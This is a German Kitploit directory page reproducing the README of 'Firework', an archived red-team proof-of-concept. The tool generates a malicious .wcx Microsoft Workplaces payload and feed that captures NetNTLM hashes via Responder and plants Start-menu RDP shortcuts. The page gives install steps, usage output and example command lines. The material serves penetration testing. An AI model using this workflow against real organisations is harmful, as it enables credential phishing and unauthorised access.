Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Firework — Firework ist ein Proof-of-Concept-Tool zur Interaktion mit Microsoft Workplaces, das gültige Dateien erstellt, die für den Bereitstellungsprozess erforderlich sind. | Kitploit
Tools/GitHubGitHub/spiderlabs/firework
OSINT für Social EngineeringPayload-GenerierungPhishingPenetrationstestsCommand and ControlSocial EngineeringAuthentifizierungRed TeamingArchived
GitHubspiderlabs/firework

Firework

Firework ist ein Proof-of-Concept-Tool zur Interaktion mit Microsoft Workplaces, das gültige Dateien erstellt, die für den Bereitstellungsprozess erforderlich sind.

4310vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite

⚠️ HINWEIS: Dieses Tool wird nicht mehr aktiv gewartet.

Firework

alt text

Firework ist ein Proof-of-Concept-Tool zur Interaktion mit Microsoft Workplaces, das gültige Dateien erstellt, die für den Bereitstellungsprozess erforderlich sind. Das Tool enthält außerdem Code aus Responder, um dessen Fähigkeit zu nutzen, NetNTLM-Hashes von einem System zu erfassen, das einen Workplace-Feed darüber bereitstellt.

Dieses Tool kann im Rahmen eines Penetrationstests oder einer Red-Team-Übung verwendet werden, um eine .wcx-Nutzlast (und den zugehörigen Feed) zu erstellen, die bei einem Klick Folgendes ermöglicht:

  • Phishing nach Anmeldeinformationen – NetNTLM-Hashes werden gesendet, wenn ein Benutzer seine Anmeldeinformationen eingibt (oder unter älteren Windows-Versionen automatisch).
  • Elemente zum Startmenü hinzufügen – Nach der Einrichtung werden dem Startmenü Verknüpfungen hinzugefügt, die die bereitgestellten RDP-Dateien starten. Diese Einträge könnten potenziell im Rahmen einer größeren Social-Engineering-Kampagne verwendet werden.
  • Ressourcen herunterladen – Ressourcen wie die .rdp-Dateien und Symboldateien werden von Windows täglich heruntergeladen und aktualisiert (sofern die Authentifizierung des Feeds deaktiviert ist oder erfüllt wird).

Lies den SpiderLabs-Blog für eine detailliertere Zusammenfassung und Anleitung.

Installation

  • Getestet mit Python 2.7.x. (Python3 wird derzeit nicht unterstützt, obwohl die Hauptklasse Firework in Python 3 verwendet werden könnte)
root@kitploit:~
$ pip install -r requirements.txt
  • Das Tool stellt Inhalte über HTTPS bereit und benötigt ein Zertifikat und einen privaten Schlüssel, um den integrierten Webserver mit NetNTLM-Erfassung zu nutzen. Standarddateien: cert.crt und key.pem

Verwendung

root@kitploit:~

.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

Beispiele

Einfaches Beispiel:

  • Organisation: EvilCorp
  • URL zum Feed-XML (oder URL zum integrierten Server von Firework): https://example.org/ – Von hier lädt Windows den Feed herunter.
  • Anwendungsname: Firework
  • Dateierweiterung: .fwk
  • Symboldatei: firework.ico
root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 

Der integrierte Webserver startet auf Port 443, falls cert.crt und key.pem im aktuellen Verzeichnis vorhanden sind. Dies erzwingt eine NTLM-Herausforderung mit Responder. Falls diese Dateien nicht vorhanden sind, schreibt das Tool alle Dateien in das lokale Verzeichnis für das eigene Hosting.

Falls der integrierte Webserver auf einem anderen Port gestartet werden soll, verwende das Flag -l wie unten:

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

Es können auch einige Anpassungen an der bereitgestellten .rdp-Datei vorgenommen werden.

  • Remotedesktop-Server: dc.corp.local
  • Domäne: corp.local
  • Benutzername: admin
  • Passwort-Crypt: Verschlüsseltes Passwort, das in die RDP-Datei aufgenommen wird

Hinweis: In .rdp-Dateien gespeicherte Passwörter werden in einer Standardkonfiguration wahrscheinlich ignoriert.

root@kitploit:~
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Nutzlast

Nach dem Ausführen des Tools wird 'payload.wcx' in das aktuelle Verzeichnis geschrieben. Diese Datei startet beim Anklicken den Bereitstellungsprozess.

Autoren

  • David Middlehurst – Twitter- @dtmsecurity

Lizenz

Firework

Erstellt von David Middlehurst Copyright (C) 2018 Trustwave Holdings, Inc.

Dieses Programm ist freie Software: Sie können es unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, entweder Version 3 der Lizenz oder (nach Ihrer Wahl) jeder späteren Version weitergeben und/oder modifizieren.

Dieses Programm wird in der Hoffnung verteilt, dass es nützlich sein wird, aber OHNE JEDE GEWÄHRLEISTUNG; sogar ohne die implizite Gewährleistung der MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Siehe die GNU General Public License für weitere Details.

Danksagungen

  • Responder von Laurent Gaffie
  • Firework Icon
Tool herunterladen